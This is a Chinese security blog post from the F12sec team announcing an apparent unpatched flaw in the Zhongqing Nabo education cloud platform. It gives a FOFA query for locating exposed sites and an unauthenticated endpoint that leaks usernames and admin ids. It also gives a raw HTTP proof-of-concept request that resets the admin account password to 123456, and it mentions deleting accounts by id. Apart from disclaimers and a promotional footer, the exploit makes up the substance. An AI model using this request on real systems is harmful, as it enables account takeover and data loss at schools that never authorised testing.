申明:本次测试只作为学习用处,请勿未授权进行渗透测试,切勿用于其它用途!
ps:此0day由团队师傅AGONI贡献,转载请注明来源。
1.漏洞背景
北京中庆纳博信息技术有限公司,简称中庆纳博,是有20年历史的中庆集团旗下核心企业,专注于教育信息化的深度应用领域。产品以教育软件为主,核心产品为“中庆教育云”平台。公司成立三年多来,客户已遍及全国各地,“中庆教育云”亦成为业内的知名品牌。
2.fofa语法
fofa语法:"中庆纳博"
3.漏洞利用
http://xxxxxx/api/TeacherQuery/SearchTeacherInSiteWithPagerRecords
访问此链接,可以看见泄露用户名,以及管理id。然后可以通过 用户名重置密码为默认密码123456
poc如下 :
POST /api/User/ResetPassword HTTP/1.1
Host: xxxxxxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 23
Origin: http://117.36.154.34:8010
DNT: 1
Connection: close
Referer: http://xxxxxxxx/default/admin/user/index{"loginName":"admin"}也可以通过 id删除账户
-
往期精彩推荐
❤️爱心三连击
1.关注公众号「F12sec」!
2.本文已收录在F12sec官方网站:http://www.0dayhack.net/
3.看到这里了就点个关注支持下吧,你的「关注」是我创作的动力。
公众号:F12sec
QQ群:884338047
官方网站:http://www.0dayhack.net/
这是一个终身学习的团队,他们在坚持自己热爱的事情,欢迎加入F12sec,和师傅们一起开心的挖洞~
关注和转发是莫大鼓励❤️
本文始发于微信公众号(F12sec):漏洞复现 | (0day通用)中庆纳博某系统敏感信息泄露+未授权
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论